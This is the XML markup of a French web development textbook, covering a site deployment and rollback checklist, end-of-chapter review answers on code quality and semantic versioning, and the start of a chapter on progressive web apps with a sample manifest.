          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>## Procédure de déploiement</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>npm ci &amp;&amp; npm run build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2. Vérifier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dist/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : pas de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, pas de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rsync -avz --delete dist/ deploy@serveur:/var/www/site/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">4. Vider le cache CDN : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -X POST https://cdn/.../purge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>5. Contrôler : page d'accueil, formulaire, en-têtes de sécurité</w:t>
        <w:br/>
        <w:t xml:space="preserve">6. En cas d'échec : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git checkout v1.4.3 &amp;&amp; npm run build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> puis recommencer</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Accès</w:t>
        <w:br/>
        <w:t>- Hébergement : coffre partagé, entrée « site-asso »</w:t>
        <w:br/>
        <w:t>- Nom de domaine : registrar, compte de l'association</w:t>
        <w:br/>
        <w:t>- Analytics : compte de l'association</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les accès et la procédure sont les deux informations les plus souvent perdues lors d'un départ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La procédure de retour arrière est aussi importante que la procédure de déploiement.</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 doit vérifier en priorité une revue de code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Le style d'indentation</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La correction et la lisibilité</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La vitesse de frappe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 nombre de lignes</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Quel type de commentaire est le plus utile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Celui qui paraphrase le code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Celui qui explique une décision</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Celui qui commente chaque ligne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Aucun</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Qu'est-ce que la dette technique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 emprunt bancaire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Un raccourci qui renchérit les évolutions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Un bug non corrigé</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Une dépendance payante</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>1.5.0 → 2.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en versionnement sémantique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 correctif</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Un ajout compatible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Une rupture de compatibilité</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Une préversion</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À quoi sert un document de décision d'architecture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À documenter le code ligne par ligne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À conserver les raisons d'un choix</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À remplacer les tests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À mesurer la performance</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Correction, lisibilité, cohérence, sécurité et testabilité.</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Le code dit comment ; le commentaire explique pourquoi.</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Elle peut être assumée, à condition d'être explicite et suivie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le changement d'indicatif majeur signale une incompatibilité.</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Il conserve le contexte et les options écartées, utiles des mois plus tard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId68"/>
          <w:footerReference w:type="default" r:id="rId69"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE VII</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Le Web comme plateforme</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Installer un site comme une application, le faire fonctionner hors-ligne, dessiner avec SVG et canvas, soigner la typographie et tester l'interface.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. Applications web progressives · 2. SVG, canvas et visualisation · 3. Polices web et typographie fine · 4. Tester une interface : unité, intégration et bout en bout · 5. Tableaux de données et listes longues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>41. Applications web progressives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Donner à un site l'installation, le hors-ligne et la rapidité d'une application native, sans quitter le Web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Avancé · Prérequis : chapitre 40</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Identifier ce qui distingue une PWA d'un site.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Écrire un manifeste d'application.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Mettre en cache les ressources avec un service worker.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Gérer le hors-ligne et la mise à jour.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Éviter les pièges de cache qui figent une version.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>41.1 Trois briques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une application web progressive n'est pas une technologie unique : c'est un site servi en HTTPS, décrit par un manifeste, et complété par un service worker qui s'interpose entre le réseau et la page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="51" name="Picture 51"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f49.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.49 — Les trois couches d'une PWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.133 — Quatre briques obligatoires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69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Brique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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322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Sans elle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sécuriser l'origine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune installation possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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Manifeste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Décrire l'application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Pas d'icône ni de nom installé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2691"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service worker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intercepter les requêtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3229"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucun mode hors-ligne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="269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Icônes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Identité visuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="322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Installation refusée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SERVICE WORKER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Script exécuté dans un contexte séparé, sans accès au DOM, qui intercepte les requêtes réseau de son périmètre et peut y répondre depuis un cache.</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UN SERVICE WORKER SURVIT À LA FERMETURE DE L'ONGLET</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une fois installé, il continue d'intercepter les requêtes lors des visites suivantes. Un cache mal conçu peut servir une version ancienne pendant des semaines, y compris après correction du serveur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>41.2 Le manifeste</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le manifeste est un fichier JSON lié depuis chaque page. Il décrit le nom, les icônes, la couleur de thème et le mode d'affichage attendu à l'installation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un manifeste complet · json</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w:t>
        <w:br/>
        <w:t xml:space="preserve">  "name": "Carnet de recettes",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "short_name": "Carnet",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "description": "Vos recettes, même sans réseau.",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "start_url": "/",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "scope": "/",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "display": "standalone",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "background_color": "#FBF3E2",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "theme_color": "#0F2E4C",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "lang": "fr",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "dir": "ltr",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "icons": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { "src": "/icones/192.png", "sizes": "192x192", "type": "image/png" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { "src": "/icones/512.png", "sizes": "512x512", "type": "image/png" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { "src": "/icones/masque.png", "sizes": "512x512", "type": "image/png",</w:t>
        <w:br/>
        <w:t xml:space="preserve">      "purpose": "maskable" }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "shortcuts": [</w:t>
        <w:br/>
        <w:t xml:space="preserve">    { "name": "Nouvelle recette", "url": "/nouvelle" }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ]</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois lignes dans l'en-tête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 Liaison depuis la page --&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="manifest" href="/manifeste.webmanifest"&gt;</w:t>
        <w:br/>
        <w:t>&lt;meta name="theme-color" content="#0F2E4C"&gt;</w:t>
        <w:br/>
        <w:t>&lt;link rel="apple-touch-icon" href="/icones/192.png"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.134 — Six champs à soigner</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96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Champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Erreur fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom installé</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Absent du manifeste</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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short_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Nom sous l'icône</w:t>
            </w:r>
          </w:p>
        </w:tc>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Trop long, tronqué</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
